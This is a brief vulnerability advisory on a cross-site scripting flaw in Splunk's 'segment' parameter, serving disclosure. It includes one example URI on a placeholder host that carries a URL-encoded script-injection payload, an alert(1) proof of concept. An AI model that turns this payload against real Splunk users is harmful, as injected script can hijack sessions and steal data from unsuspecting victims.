Splunk 'segment' Parameter Cross Site Scripting Vulnerability

Splunk 'segment' Parameter Cross Site Scripting Vulnerability

To exploit this issue, an attacker must entice an unsuspecting user to follow a malicious URI.

The following example URI is available:

http://www.example.com/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened